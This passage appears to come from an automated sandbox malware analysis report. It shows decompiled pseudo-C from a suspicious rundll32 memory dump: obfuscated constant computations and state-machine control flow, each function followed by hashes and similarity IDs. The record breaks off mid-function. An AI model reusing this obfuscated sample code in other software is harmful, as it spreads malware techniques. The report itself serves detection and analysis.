                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E0034A666(intOrPtr* __ecx) {
                                                                                                                    				char _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				signed int _v140;
                                                                                                                    				intOrPtr* _v144;
                                                                                                                    				signed int _v148;
                                                                                                                    				signed int _v152;
                                                                                                                    				signed int _v156;
                                                                                                                    				signed int _v160;
                                                                                                                    				signed int _v164;
                                                                                                                    				signed int _v168;
                                                                                                                    				signed int _v172;
                                                                                                                    				signed int _v176;
                                                                                                                    				signed int _v180;
                                                                                                                    				signed int _v184;
                                                                                                                    				signed int _v188;
                                                                                                                    				signed int _v192;
                                                                                                                    				signed int _v196;
                                                                                                                    				signed int _v200;
                                                                                                                    				signed int _v204;
                                                                                                                    				signed int _v208;
                                                                                                                    				void* _t185;
                                                                                                                    				void* _t187;
                                                                                                                    				signed int _t194;
                                                                                                                    				signed int _t203;
                                                                                                                    				intOrPtr* _t204;
                                                                                                                    				signed int _t231;
                                                                                                                    				signed int _t232;
                                                                                                                    				signed int _t233;
                                                                                                                    				signed int _t234;
                                                                                                                    				signed int _t235;
                                                                                                                    				void* _t236;
                                                                                                                    				signed int _t239;
                                                                                                                    				signed int* _t240;
                                                                                                                    
                                                                                                                    				_t204 = __ecx;
                                                                                                                    				_t240 =  &_v208;
                                                                                                                    				_v144 = __ecx;
                                                                                                                    				_v188 = 0x57b051;
                                                                                                                    				_v188 = _v188 ^ 0x0e33ee27;
                                                                                                                    				_v188 = _v188 * 0x1d;
                                                                                                                    				_t236 = 0xac5721c;
                                                                                                                    				_v188 = _v188 << 4;
                                                                                                                    				_v188 = _v188 ^ 0x15e508b7;
                                                                                                                    				_v156 = 0xb3c586;
                                                                                                                    				_v156 = _v156 + 0xc4f5;
                                                                                                                    				_v156 = _v156 ^ 0x00bed25a;
                                                                                                                    				_v168 = 0x711032;
                                                                                                                    				_v168 = _v168 << 8;
                                                                                                                    				_v168 = _v168 + 0x5169;
                                                                                                                    				_v168 = _v168 ^ 0x711dace8;
                                                                                                                    				_v192 = 0xa2549d;
                                                                                                                    				_v192 = _v192 + 0x52ae;
                                                                                                                    				_v192 = _v192 >> 1;
                                                                                                                    				_v192 = _v192 >> 3;
                                                                                                                    				_v192 = _v192 ^ 0x000eb53b;
                                                                                                                    				_v140 = 0xe7e5a1;
                                                                                                                    				_t231 = 0x32;
                                                                                                                    				_v140 = _v140 * 0x50;
                                                                                                                    				_v140 = _v140 ^ 0x4874e895;
                                                                                                                    				_v208 = 0x1967bb;
                                                                                                                    				_v208 = _v208 << 4;
                                                                                                                    				_v208 = _v208 | 0x201d9a42;
                                                                                                                    				_v208 = _v208 / _t231;
                                                                                                                    				_v208 = _v208 ^ 0x00a7f54f;
                                                                                                                    				_v152 = 0x52a7fc;
                                                                                                                    				_v152 = _v152 + 0x45a2;
                                                                                                                    				_v152 = _v152 ^ 0x0052edd3;
                                                                                                                    				_v160 = 0x3027b3;
                                                                                                                    				_v160 = _v160 + 0xfd14;
                                                                                                                    				_v160 = _v160 ^ 0x0036c553;
                                                                                                                    				_v180 = 0x38862e;
                                                                                                                    				_v180 = _v180 ^ 0x0f350481;
                                                                                                                    				_t232 = 0x7c;
                                                                                                                    				_v180 = _v180 * 0x65;
                                                                                                                    				_v180 = _v180 ^ 0xf053ee57;
                                                                                                                    				_v136 = 0x356a19;
                                                                                                                    				_v136 = _v136 ^ 0xbed63dcb;
                                                                                                                    				_v136 = _v136 ^ 0xbeeb3706;
                                                                                                                    				_v164 = 0x14aaf;
                                                                                                                    				_v164 = _v164 + 0xffffc1af;
                                                                                                                    				_v164 = _v164 ^ 0x000285a1;
                                                                                                                    				_v200 = 0x7f3e04;
                                                                                                                    				_v200 = _v200 * 0x53;
                                                                                                                    				_v200 = _v200 + 0xffffdc1b;
                                                                                                                    				_v200 = _v200 + 0x69f9;
                                                                                                                    				_v200 = _v200 ^ 0x2945b47b;
                                                                                                                    				_v148 = 0xc6ed1e;
                                                                                                                    				_v148 = _v148 >> 6;
                                                                                                                    				_v148 = _v148 ^ 0x0006dab0;
                                                                                                                    				_v172 = 0x6d07b9;
                                                                                                                    				_v172 = _v172 / _t232;
                                                                                                                    				_t233 = 0x35;
                                                                                                                    				_v172 = _v172 / _t233;
                                                                                                                    				_v172 = _v172 ^ 0x00041e3e;
                                                                                                                    				_v204 = 0x57aab;
                                                                                                                    				_v204 = _v204 + 0xdcdc;
                                                                                                                    				_v204 = _v204 * 0x48;
                                                                                                                    				_v204 = _v204 << 8;
                                                                                                                    				_v204 = _v204 ^ 0xc89fb5e3;
                                                                                                                    				_v132 = 0xff84eb;
                                                                                                                    				_v132 = _v132 << 5;
                                                                                                                    				_v132 = _v132 ^ 0x1ff23c26;
                                                                                                                    				_v196 = 0xcb0ee1;
                                                                                                                    				_v196 = _v196 | 0xd8d8bfc1;
                                                                                                                    				_v196 = _v196 << 4;
                                                                                                                    				_v196 = _v196 ^ 0x8dbe7284;
                                                                                                                    				_v184 = 0x3f345e;
                                                                                                                    				_t234 = 0x7b;
                                                                                                                    				_v184 = _v184 * 0x5e;
                                                                                                                    				_v184 = _v184 ^ 0x1738d684;
                                                                                                                    				_v176 = 0x75d12f;
                                                                                                                    				_t239 = _v184;
                                                                                                                    				_t203 = _v184;
                                                                                                                    				_t235 = _v184;
                                                                                                                    				_v176 = _v176 / _t234;
                                                                                                                    				_v176 = _v176 + 0xb925;
                                                                                                                    				_v176 = _v176 ^ 0x0007fac1;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t185 = 0x80ddafd;
                                                                                                                    					do {
                                                                                                                    						while(_t236 != 0x3002390) {
                                                                                                                    							if(_t236 == _t185) {
                                                                                                                    								_push(_v204);
                                                                                                                    								_push(_v172);
                                                                                                                    								_t187 = E0034DCF7(_v148, 0x331540, __eflags);
                                                                                                                    								_push(_t235);
                                                                                                                    								_push( &_v128);
                                                                                                                    								_push(_t187);
                                                                                                                    								_push(_t239);
                                                                                                                    								_push(_t203);
                                                                                                                    								 *((intOrPtr*)(E0033A42D(0xab2a8d8a, 0x2b7)))();
                                                                                                                    								E0033A8B0(_v132, _t187, _v196);
                                                                                                                    								_t236 = 0xc2d90a2;
                                                                                                                    								goto L11;
                                                                                                                    							} else {
                                                                                                                    								if(_t236 == 0x94501ee) {
                                                                                                                    									_t194 = E00340AE0(0x10, 1);
                                                                                                                    									_push(_v140);
                                                                                                                    									_t239 = _t194;
                                                                                                                    									_push( &_v128);
                                                                                                                    									_push(_t239);
                                                                                                                    									_push(0xb);
                                                                                                                    									E003380E3(_v168, _v192);
                                                                                                                    									_t236 = 0x3002390;
                                                                                                                    									L11:
                                                                                                                    									_t240 =  &(_t240[6]);
                                                                                                                    									L12:
                                                                                                                    									_t204 = _v144;
                                                                                                                    									goto L1;
                                                                                                                    								} else {
                                                                                                                    									if(_t236 == 0xac5721c) {
                                                                                                                    										_t236 = 0x94501ee;
                                                                                                                    										continue;
                                                                                                                    									} else {
                                                                                                                    										if(_t236 == 0xc2d90a2) {
                                                                                                                    											E00348519(_v184, _v176, _t235);
                                                                                                                    										} else {
                                                                                                                    											if(_t236 != 0xd4e1cec) {
                                                                                                                    												goto L17;
                                                                                                                    											} else {
                                                                                                                    												_t239 = 0x4000;
                                                                                                                    												_push(_t204);
                                                                                                                    												_push(_t204);
                                                                                                                    												_t203 = E00337FF2(0x4000);
                                                                                                                    												_t185 = 0x80ddafd;
                                                                                                                    												_t204 = _v144;
                                                                                                                    												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
                                                                                                                    												continue;
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							L20:
                                                                                                                    							return _t203;
                                                                                                                    						}
                                                                                                                    						_t235 = E00334816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
                                                                                                                    						_t240 =  &(_t240[4]);
                                                                                                                    						__eflags = _t235;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							_t204 = _v144;
                                                                                                                    							_t236 = 0x99c1651;
                                                                                                                    							_t185 = 0x80ddafd;
                                                                                                                    							goto L17;
                                                                                                                    						} else {
                                                                                                                    							_t236 = 0xd4e1cec;
                                                                                                                    							goto L12;
                                                                                                                    						}
                                                                                                                    						goto L20;
                                                                                                                    						L17:
                                                                                                                    						__eflags = _t236 - 0x99c1651;
                                                                                                                    					} while (__eflags != 0);
                                                                                                                    					goto L20;
                                                                                                                    				}
                                                                                                                    			}






































                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ^4?$iQ
                                                                                                                    • API String ID: 0-3971506469
                                                                                                                    • Opcode ID: 574dc20f60540f6f86d3e45838bb75ed6693124e246217cd5acafca8c82727ff
                                                                                                                    • Instruction ID: 9da7f52b342153cb7223c630f459346ae2f568dd2da8b5dedd8c097854fd4863
                                                                                                                    • Opcode Fuzzy Hash: 574dc20f60540f6f86d3e45838bb75ed6693124e246217cd5acafca8c82727ff
                                                                                                                    • Instruction Fuzzy Hash: BEA162729083409FC354CF29D58990BFBE1BBC4758F41492DF99AAA260C7B5E949CF83
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E00348BE3() {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				void* _v88;
                                                                                                                    				intOrPtr _v92;
                                                                                                                    				signed int _t203;
                                                                                                                    				short _t206;
                                                                                                                    				short _t211;
                                                                                                                    				signed int _t214;
                                                                                                                    				void* _t216;
                                                                                                                    				intOrPtr _t238;
                                                                                                                    				void* _t239;
                                                                                                                    				void* _t240;
                                                                                                                    				short* _t241;
                                                                                                                    				short* _t242;
                                                                                                                    				signed int _t243;
                                                                                                                    				signed int _t244;
                                                                                                                    				signed int _t245;
                                                                                                                    				signed int _t246;
                                                                                                                    				signed int _t247;
                                                                                                                    				signed int _t248;
                                                                                                                    				signed int _t249;
                                                                                                                    				signed int _t250;
                                                                                                                    				void* _t251;
                                                                                                                    
                                                                                                                    				_v92 = 0x476c75;
                                                                                                                    				asm("stosd");
                                                                                                                    				_t216 = 0xb7209d2;
                                                                                                                    				_t243 = 0x73;
                                                                                                                    				asm("stosd");
                                                                                                                    				asm("stosd");
                                                                                                                    				_t238 =  *0x353e10; // 0x0
                                                                                                                    				_v16 = 0xe95677;
                                                                                                                    				_t239 = _t238 + 0x1c;
                                                                                                                    				_v16 = _v16 + 0xffffde88;
                                                                                                                    				_v16 = _v16 | 0xcd71b475;
                                                                                                                    				_v16 = _v16 + 0xffffb9cf;
                                                                                                                    				_v16 = _v16 ^ 0xcdf0e35f;
                                                                                                                    				_v48 = 0xdf79ef;
                                                                                                                    				_v48 = _v48 / _t243;
                                                                                                                    				_t244 = 0x6b;
                                                                                                                    				_v48 = _v48 * 0x6d;
                                                                                                                    				_v48 = _v48 ^ 0x00d012e0;
                                                                                                                    				_v20 = 0x9de8b4;
                                                                                                                    				_v20 = _v20 + 0xffff612d;
                                                                                                                    				_v20 = _v20 / _t244;
                                                                                                                    				_v20 = _v20 ^ 0xc642351f;
                                                                                                                    				_v20 = _v20 ^ 0xc646a40f;
                                                                                                                    				_v52 = 0x8fb5bf;
                                                                                                                    				_v52 = _v52 << 0xa;
                                                                                                                    				_v52 = _v52 | 0x07a5acc8;
                                                                                                                    				_v52 = _v52 ^ 0x3ff13d54;
                                                                                                                    				_v68 = 0x5451dc;
                                                                                                                    				_v68 = _v68 << 4;
                                                                                                                    				_v68 = _v68 ^ 0x054b95e9;
                                                                                                                    				_v56 = 0x52bd8b;
                                                                                                                    				_v56 = _v56 >> 2;
                                                                                                                    				_t245 = 0x43;
                                                                                                                    				_v56 = _v56 * 0x7a;
                                                                                                                    				_v56 = _v56 ^ 0x09d97bb2;
                                                                                                                    				_v24 = 0x3d3b88;
                                                                                                                    				_v24 = _v24 / _t245;
                                                                                                                    				_v24 = _v24 + 0xfffff551;
                                                                                                                    				_v24 = _v24 ^ 0x58fd9949;
                                                                                                                    				_v24 = _v24 ^ 0x58f7485b;
                                                                                                                    				_v28 = 0x8d7fa4;
                                                                                                                    				_v28 = _v28 | 0x74f1f66b;
                                                                                                                    				_v28 = _v28 + 0xbcb0;
                                                                                                                    				_t246 = 0x1d;
                                                                                                                    				_v28 = _v28 / _t246;
                                                                                                                    				_v28 = _v28 ^ 0x0406308a;
                                                                                                                    				_v76 = 0xb13dbd;
                                                                                                                    				_v76 = _v76 >> 4;
                                                                                                                    				_v76 = _v76 ^ 0x0001a54a;
                                                                                                                    				_v72 = 0x3dff58;
                                                                                                                    				_v72 = _v72 + 0xffff5d9c;
                                                                                                                    				_v72 = _v72 ^ 0x00301633;
                                                                                                                    				_v8 = 0xd63a62;
                                                                                                                    				_v8 = _v8 >> 4;
                                                                                                                    				_v8 = _v8 << 5;
                                                                                                                    				_v8 = _v8 ^ 0xdca434f7;
                                                                                                                    				_v8 = _v8 ^ 0xdd0cf0dc;
                                                                                                                    				_v44 = 0x6f20d8;
                                                                                                                    				_v44 = _v44 >> 0xb;
                                                                                                                    				_v44 = _v44 ^ 0xaa766a49;
                                                                                                                    				_v44 = _v44 ^ 0xaa79f73d;
                                                                                                                    				_v64 = 0x5810b3;
                                                                                                                    				_t247 = 0x3e;
                                                                                                                    				_v64 = _v64 * 0x13;
                                                                                                                    				_v64 = _v64 ^ 0x068d2e2f;
                                                                                                                    				_v60 = 0xa1705b;
                                                                                                                    				_v60 = _v60 / _t247;
                                                                                                                    				_v60 = _v60 ^ 0x000746d3;
                                                                                                                    				_v12 = 0xe49076;
                                                                                                                    				_v12 = _v12 | 0xf94b921d;
                                                                                                                    				_t248 = 0x66;
                                                                                                                    				_v12 = _v12 / _t248;
                                                                                                                    				_v12 = _v12 | 0x30c6fb91;
                                                                                                                    				_v12 = _v12 ^ 0x32fd72cc;
                                                                                                                    				_v40 = 0x4af1f5;
                                                                                                                    				_v40 = _v40 + 0xffff1f3a;
                                                                                                                    				_v40 = _v40 + 0x5998;
                                                                                                                    				_v40 = _v40 | 0x0efc634a;
                                                                                                                    				_v40 = _v40 ^ 0x0ef1d3e1;
                                                                                                                    				_v36 = 0xca0e2e;
                                                                                                                    				_v36 = _v36 + 0xa6ab;
                                                                                                                    				_v36 = _v36 * 0x17;
                                                                                                                    				_v36 = _v36 | 0xed84f45f;
                                                                                                                    				_v36 = _v36 ^ 0xffb3e96f;
                                                                                                                    				_v32 = 0x9f068d;
                                                                                                                    				_v32 = _v32 | 0xccdcedf7;
                                                                                                                    				_v32 = _v32 >> 8;
                                                                                                                    				_v32 = _v32 << 0x10;
                                                                                                                    				_v32 = _v32 ^ 0xdfe821c7;
                                                                                                                    				do {
                                                                                                                    					while(_t216 != 0x5ccdb59) {
                                                                                                                    						if(_t216 == 0x80e5149) {
                                                                                                                    							_push(_v32);
                                                                                                                    							_push(_t239);
                                                                                                                    							_push(3);
                                                                                                                    							_push(1);
                                                                                                                    							E003380E3(_v40, _v36);
                                                                                                                    							 *((short*)(_t239 + 6)) = 0;
                                                                                                                    							return 0;
                                                                                                                    						}
                                                                                                                    						if(_t216 == 0xb7209d2) {
                                                                                                                    							_t211 = E0034D25E(_t216);
                                                                                                                    							_t216 = 0x5ccdb59;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t216 != 0xeb2e9e3) {
                                                                                                                    							goto L8;
                                                                                                                    						}
                                                                                                                    						_t214 = E00340AE0(0x10, 4);
                                                                                                                    						_push(_v12);
                                                                                                                    						_t250 = _t214;
                                                                                                                    						_push(_t239);
                                                                                                                    						_push(_t250);
                                                                                                                    						_push(1);
                                                                                                                    						E003380E3(_v64, _v60);
                                                                                                                    						_t251 = _t251 + 0x18;
                                                                                                                    						_t242 = _t239 + _t250 * 2;
                                                                                                                    						_t216 = 0x80e5149;
                                                                                                                    						_t211 = 0x2e;
                                                                                                                    						 *_t242 = _t211;
                                                                                                                    						_t239 = _t242 + 2;
                                                                                                                    					}
                                                                                                                    					_t203 = E00340AE0(0x10, 4);
                                                                                                                    					_push(_v24);
                                                                                                                    					_t249 = _t203;
                                                                                                                    					_push(_t239);
                                                                                                                    					_push(1);
                                                                                                                    					_push(2);
                                                                                                                    					E003380E3(_v68, _v56);
                                                                                                                    					_push(_v72);
                                                                                                                    					_t240 = _t239 + 2;
                                                                                                                    					_push(_t240);
                                                                                                                    					_push(_t249);
                                                                                                                    					_push(1);
                                                                                                                    					E003380E3(_v28, _v76);
                                                                                                                    					_t251 = _t251 + 0x28;
                                                                                                                    					_t241 = _t240 + _t249 * 2;
                                                                                                                    					_t216 = 0xeb2e9e3;
                                                                                                                    					_t206 = 0x5c;
                                                                                                                    					 *_t241 = _t206;
                                                                                                                    					_t239 = _t241 + 2;
                                                                                                                    					L8:
                                                                                                                    				} while (_t216 != 0x3f21c37);
                                                                                                                    				return _t211;
                                                                                                                    			}
                                                                                                                    0x00348ebc
                                                                                                                    0x00348ec2
                                                                                                                    0x00348ec8
                                                                                                                    0x00348ec9
                                                                                                                    0x00348eca
                                                                                                                    0x00348ecc
                                                                                                                    0x00348ed1
                                                                                                                    0x00348ed4
                                                                                                                    0x00348ed7
                                                                                                                    0x00348ede
                                                                                                                    0x00348edf
                                                                                                                    0x00348ee2
                                                                                                                    0x00348ee5
                                                                                                                    0x00348ee5
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ulG$wV
                                                                                                                    • API String ID: 0-391097709
                                                                                                                    • Opcode ID: 2bb94bd1118e86fdc4f233d1fc99bbf71a5ea20dec33582707e194fbf905f39d
                                                                                                                    • Instruction ID: b53bc0bc68d93b77556ce109d8a031fc680025fb17c8477fd16dfccfb480e39a
                                                                                                                    • Opcode Fuzzy Hash: 2bb94bd1118e86fdc4f233d1fc99bbf71a5ea20dec33582707e194fbf905f39d
                                                                                                                    • Instruction Fuzzy Hash: 04914471D01319EBDB14DFE9D88A9DEBBB1FF44314F208109E216BA2A0D7B01A46CF95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00336D24() {
                                                                                                                    				char _v524;
                                                                                                                    				signed int _v528;
                                                                                                                    				signed int _v532;
                                                                                                                    				signed int _v536;
                                                                                                                    				signed int _v540;
                                                                                                                    				signed int _v544;
                                                                                                                    				signed int _v548;
                                                                                                                    				signed int _v552;
                                                                                                                    				signed int _v556;
                                                                                                                    				signed int _v560;
                                                                                                                    				signed int _v564;
                                                                                                                    				signed int _v568;
                                                                                                                    				signed int _v572;
                                                                                                                    				signed int _v576;
                                                                                                                    				signed int _v580;
                                                                                                                    				signed int _v584;
                                                                                                                    				signed int _v588;
                                                                                                                    				signed int _v592;
                                                                                                                    				short* _t158;
                                                                                                                    				void* _t161;
                                                                                                                    				void* _t164;
                                                                                                                    				intOrPtr _t173;
                                                                                                                    				intOrPtr _t188;
                                                                                                                    				signed int _t192;
                                                                                                                    				signed int _t193;
                                                                                                                    				signed int _t194;
                                                                                                                    				signed int _t195;
                                                                                                                    				void* _t198;
                                                                                                                    
                                                                                                                    				_v556 = 0x5b9523;
                                                                                                                    				_v556 = _v556 ^ 0xd644881d;
                                                                                                                    				_t164 = 0xafec1cc;
                                                                                                                    				_v556 = _v556 ^ 0xd61fc18a;
                                                                                                                    				_v560 = 0xf0211a;
                                                                                                                    				_v560 = _v560 >> 0xc;
                                                                                                                    				_v560 = _v560 >> 0xf;
                                                                                                                    				_v560 = _v560 ^ 0x000d86e8;
                                                                                                                    				_v536 = 0x5b86ee;
                                                                                                                    				_t192 = 0x7a;
                                                                                                                    				_v536 = _v536 / _t192;
                                                                                                                    				_v536 = _v536 ^ 0x00051f37;
                                                                                                                    				_v528 = 0x15dba1;
                                                                                                                    				_v528 = _v528 + 0xffff3226;
                                                                                                                    				_v528 = _v528 ^ 0x001c60e6;
                                                                                                                    				_v564 = 0xcdfacc;
                                                                                                                    				_v564 = _v564 ^ 0x78a7d3e3;
                                                                                                                    				_v564 = _v564 << 0xe;
                                                                                                                    				_v564 = _v564 ^ 0x8a48a6fd;
                                                                                                                    				_v572 = 0x7eccf1;
                                                                                                                    				_v572 = _v572 + 0xffffd1bc;
                                                                                                                    				_t193 = 0x2e;
                                                                                                                    				_v572 = _v572 * 0x26;
                                                                                                                    				_v572 = _v572 ^ 0x12c53124;
                                                                                                                    				_v588 = 0x8dc921;
                                                                                                                    				_v588 = _v588 | 0x53df5653;
                                                                                                                    				_v588 = _v588 << 7;
                                                                                                                    				_v588 = _v588 * 0x73;
                                                                                                                    				_v588 = _v588 ^ 0xc8beb34e;
                                                                                                                    				_v544 = 0xe1fa74;
                                                                                                                    				_v544 = _v544 + 0xffffe6ac;
                                                                                                                    				_v544 = _v544 ^ 0x00e0f2b8;
                                                                                                                    				_v568 = 0x925246;
                                                                                                                    				_v568 = _v568 + 0xffffcd65;
                                                                                                                    				_v568 = _v568 + 0xffffdee0;
                                                                                                                    				_v568 = _v568 ^ 0x009eae97;
                                                                                                                    				_v576 = 0x3c09b4;
                                                                                                                    				_v576 = _v576 + 0xffff2c4c;
                                                                                                                    				_v576 = _v576 >> 0xa;
                                                                                                                    				_v576 = _v576 ^ 0x000cc2c3;
                                                                                                                    				_v592 = 0xac7846;
                                                                                                                    				_v592 = _v592 ^ 0xbb2572b9;
                                                                                                                    				_v592 = _v592 ^ 0xeb3265e6;
                                                                                                                    				_v592 = _v592 | 0x6a541c4b;
                                                                                                                    				_v592 = _v592 ^ 0x7af30806;
                                                                                                                    				_v548 = 0xb1a24a;
                                                                                                                    				_v548 = _v548 / _t193;
                                                                                                                    				_v548 = _v548 ^ 0x00094ccb;
                                                                                                                    				_v552 = 0xbe5b93;
                                                                                                                    				_v552 = _v552 | 0xe01e3375;
                                                                                                                    				_v552 = _v552 ^ 0xe0b0d42a;
                                                                                                                    				_v532 = 0x76dce5;
                                                                                                                    				_t194 = 0x19;
                                                                                                                    				_v532 = _v532 / _t194;
                                                                                                                    				_v532 = _v532 ^ 0x00002403;
                                                                                                                    				_v584 = 0xffb3b0;
                                                                                                                    				_v584 = _v584 << 0xc;
                                                                                                                    				_v584 = _v584 ^ 0x8b2427a7;
                                                                                                                    				_v584 = _v584 | 0x0ff5fda2;
                                                                                                                    				_v584 = _v584 ^ 0x7ffdbf2b;
                                                                                                                    				_v580 = 0x6f9ecd;
                                                                                                                    				_t195 = 0x5b;
                                                                                                                    				_v580 = _v580 / _t195;
                                                                                                                    				_v580 = _v580 << 0xc;
                                                                                                                    				_v580 = _v580 ^ 0x13a22276;
                                                                                                                    				_v540 = 0xd8d341;
                                                                                                                    				_v540 = _v540 * 0xb;
                                                                                                                    				_v540 = _v540 ^ 0x095c7847;
                                                                                                                    				do {
                                                                                                                    					while(_t164 != 0x2dc4ff7) {
                                                                                                                    						if(_t164 == 0x5cfc1e4) {
                                                                                                                    							return E00339DCF(_v532, _v584, _v580,  &_v524,  &_v524, E00334EE3, _v540, 0);
                                                                                                                    						}
                                                                                                                    						if(_t164 == 0x9efe9dd) {
                                                                                                                    							_push(_v536);
                                                                                                                    							_push(_v560);
                                                                                                                    							_t161 = E0034DCF7(_v556, 0x331000, __eflags);
                                                                                                                    							_t173 =  *0x353e10; // 0x0
                                                                                                                    							_t188 =  *0x353e10; // 0x0
                                                                                                                    							E003347CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
                                                                                                                    							_t158 = E0033A8B0(_v568, _t161, _v576);
                                                                                                                    							_t198 = _t198 + 0x24;
                                                                                                                    							_t164 = 0x2dc4ff7;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t164 != 0xafec1cc) {
                                                                                                                    							goto L8;
                                                                                                                    						}
                                                                                                                    						_t164 = 0x9efe9dd;
                                                                                                                    					}
                                                                                                                    					_t158 = E0033B6CF( &_v524, _v592, _v548, _v552);
                                                                                                                    					__eflags = 0;
                                                                                                                    					 *_t158 = 0;
                                                                                                                    					_t164 = 0x5cfc1e4;
                                                                                                                    					L8:
                                                                                                                    					__eflags = _t164 - 0xdc02af8;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				return _t158;
                                                                                                                    			}































                                                                                                                    0x00336f44
                                                                                                                    0x00336f44
                                                                                                                    0x00336f4e
                                                                                                                    0x00000000
                                                                                                                    0x0033701e
                                                                                                                    0x00336f56
                                                                                                                    0x00336f68
                                                                                                                    0x00336f71
                                                                                                                    0x00336f79
                                                                                                                    0x00336f8a
                                                                                                                    0x00336fa2
                                                                                                                    0x00336fb2
                                                                                                                    0x00336fc1
                                                                                                                    0x00336fc6
                                                                                                                    0x00336fc9
                                                                                                                    0x00000000
                                                                                                                    0x00336fc9
                                                                                                                    0x00336f5e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00336f64
                                                                                                                    0x00336f64
                                                                                                                    0x00336fe0
                                                                                                                    0x00336fe7
                                                                                                                    0x00336fe9
                                                                                                                    0x00336fec
                                                                                                                    0x00336fee
                                                                                                                    0x00336fee
                                                                                                                    0x00336fee
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Gx\$e2
                                                                                                                    • API String ID: 0-3912940318
                                                                                                                    • Opcode ID: d4afd1af54017eb52f16f819640dfef15dd41f441739bd08bfdf9aacbf9192a3
                                                                                                                    • Instruction ID: 6f386e17b20bcb379038051271e239cde12ab595e2535d0f4c8b4fec4fce0d50
                                                                                                                    • Opcode Fuzzy Hash: d4afd1af54017eb52f16f819640dfef15dd41f441739bd08bfdf9aacbf9192a3
                                                                                                                    • Instruction Fuzzy Hash: A77131711083419FC769CF25D88A81FBBF1FBC4758F109A1DF2969A260D3B19949CF86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0033A55F() {
                                                                                                                    				char _v520;
                                                                                                                    				signed int _v524;
                                                                                                                    				signed int _v528;
                                                                                                                    				intOrPtr _v532;
                                                                                                                    				signed int _v536;
                                                                                                                    				signed int _v540;
                                                                                                                    				signed int _v544;
                                                                                                                    				signed int _v548;
                                                                                                                    				signed int _v552;
                                                                                                                    				signed int _v556;
                                                                                                                    				signed int _v560;
                                                                                                                    				signed int _v564;
                                                                                                                    				signed int _v568;
                                                                                                                    				signed int _v572;
                                                                                                                    				signed int _v576;
                                                                                                                    				signed int _v580;
                                                                                                                    				signed int _v584;
                                                                                                                    				signed int _t161;
                                                                                                                    				char* _t162;
                                                                                                                    				intOrPtr _t164;
                                                                                                                    				void* _t168;
                                                                                                                    				signed int _t187;
                                                                                                                    				signed int _t189;
                                                                                                                    				signed int _t190;
                                                                                                                    				signed int _t191;
                                                                                                                    				signed int _t192;
                                                                                                                    				short* _t195;
                                                                                                                    				signed int* _t197;
                                                                                                                    
                                                                                                                    				_t197 =  &_v584;
                                                                                                                    				_v528 = _v528 & 0x00000000;
                                                                                                                    				_v524 = _v524 & 0x00000000;
                                                                                                                    				_t168 = 0xe71c2f1;
                                                                                                                    				_v532 = 0xa0346f;
                                                                                                                    				_v560 = 0x45ed96;
                                                                                                                    				_t187 = 0x29;
                                                                                                                    				_v560 = _v560 / _t187;
                                                                                                                    				_t189 = 0x5d;
